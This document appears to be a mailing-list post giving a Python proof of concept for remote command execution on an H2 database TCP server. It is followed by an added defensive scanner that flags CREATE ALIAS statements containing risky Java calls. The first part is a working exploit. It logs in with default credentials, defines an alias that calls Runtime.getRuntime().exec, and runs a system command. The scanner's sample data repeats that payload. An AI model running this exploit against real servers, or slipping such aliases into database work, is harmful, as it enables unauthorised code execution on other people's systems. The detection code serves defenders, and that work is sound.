Here's a small Python POC:

- Windows-based (feel free to tweak for *nix)
- Requires jaydebeapi (run "pip install jaydebeapi")
- Assumes javac is in the system path (so does the original POC)

import jaydebeapi

SERVER = "SERVER_TO_EXPLOIT"
conn = jaydebeapi.connect("org.h2.Driver",
    "jdbc:h2:tcp://%s:9092/C:\\Windows\\Temp\\exploit" % (SERVER), ["sa", ""],
    "./h2-1.4.196.jar",)
curs = conn.cursor()

# Define a Java alias from inline source (compiled by H2, hence the javac requirement)
curs.execute('DROP ALIAS IF EXISTS EXECVE')
curs.execute('CREATE ALIAS EXECVE AS $$ void execve(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd);  }$$;')

# Call the alias
curs.execute("CALL EXECVE('c:\\windows\\system32\\msg.exe * \"Exploited!\"')")


On Thursday, November 1, 2018 at 1:02:31 PM UTC-4, Noel Grandin wrote:
>
> where is the JDBC version of the exploit?
>
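For defenders reviewing captured SQL, a check for the CREATE ALIAS pattern used in the POC above. This is an added example, not part of the original message or of H2. The list of risky Java calls, the severity labels and the sample statements are assumptions constructed for illustration; where the statements come from (application logs, a SQL proxy) is left to the reader.

```python
import re

# CREATE ALIAS either points at an existing static method (FOR "pkg.Class.method")
# or carries inline Java source (AS $$...$$ or AS '...'), as in the POC above.
ALIAS_RE = re.compile(
    r"\bCREATE\s+ALIAS\s+(?:IF\s+NOT\s+EXISTS\s+)?(?P<name>\"[^\"]+\"|\w+)"
    r".*?\b(?P<kind>AS|FOR)\s+(?P<body>.+)",
    re.IGNORECASE | re.DOTALL,
)

# Assumption: a starter list of Java APIs worth flagging inside alias source.
RISKY_TOKENS = ("Runtime.getRuntime", "ProcessBuilder", "System.load",
                "Class.forName", "java.net.", "java.io.File")

def review_statement(sql):
    """Return a finding dict for a CREATE ALIAS statement, else None."""
    m = ALIAS_RE.search(sql)
    if not m:
        return None
    inline = m.group("kind").upper() == "AS"
    body = m.group("body").lower()
    hits = [t for t in RISKY_TOKENS if t.lower() in body]
    if inline and hits:
        severity = "high"      # inline Java that reaches process/file/network APIs
    elif inline:
        severity = "medium"    # inline Java source is still server-side code
    else:
        severity = "review"    # classpath reference; check the target method
    return {"alias": m.group("name").strip('"'), "inline_source": inline,
            "risky_calls": hits, "severity": severity}

def scan(statements):
    """Review each statement and keep only the CREATE ALIAS findings."""
    return [f for f in map(review_statement, statements) if f]

# Constructed sample input: the POC's statements plus benign ones.
SAMPLE_STATEMENTS = [
    "DROP ALIAS IF EXISTS EXECVE",
    "CREATE ALIAS EXECVE AS $$ void execve(String cmd) throws "
    "java.io.IOException { Runtime.getRuntime().exec(cmd);  }$$;",
    'CREATE ALIAS IF NOT EXISTS MY_SQRT FOR "java.lang.Math.sqrt"',
    "CREATE ALIAS ADD_ONE AS $$ int addOne(int x) { return x + 1; } $$",
    "SELECT MY_SQRT(2)",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_STATEMENTS):
        print(finding)
```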
